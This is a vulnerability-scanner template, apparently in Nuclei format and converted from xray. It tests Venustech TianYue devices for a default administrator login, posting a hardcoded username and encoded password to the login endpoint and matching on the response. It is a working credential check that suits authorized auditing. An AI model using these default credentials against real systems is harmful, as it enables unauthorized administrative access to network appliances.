id: poc-yaml-venustech-tianyue-default-password

info:
  name: poc-yaml-venustech-tianyue-default-password
  author: Aurora
  severity: medium
  tags: xray-converted,ct-456734
  reference:
    - https://www.venustech.com.cn/new_type/wlsj/

http:
  - raw:
      - |
        GET /ops/Login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        POST /ops/index.php?c=Login&a=Verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: SERVER_ADDR={{var_host}};SERVER_ADDR_FULL={{var_hostinfo}};{{var_cookie}}

        u=sysuseradmin&p=116264704E61706262667E637535202322

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
          - "(.*)[i|I]ndex(.*)}$"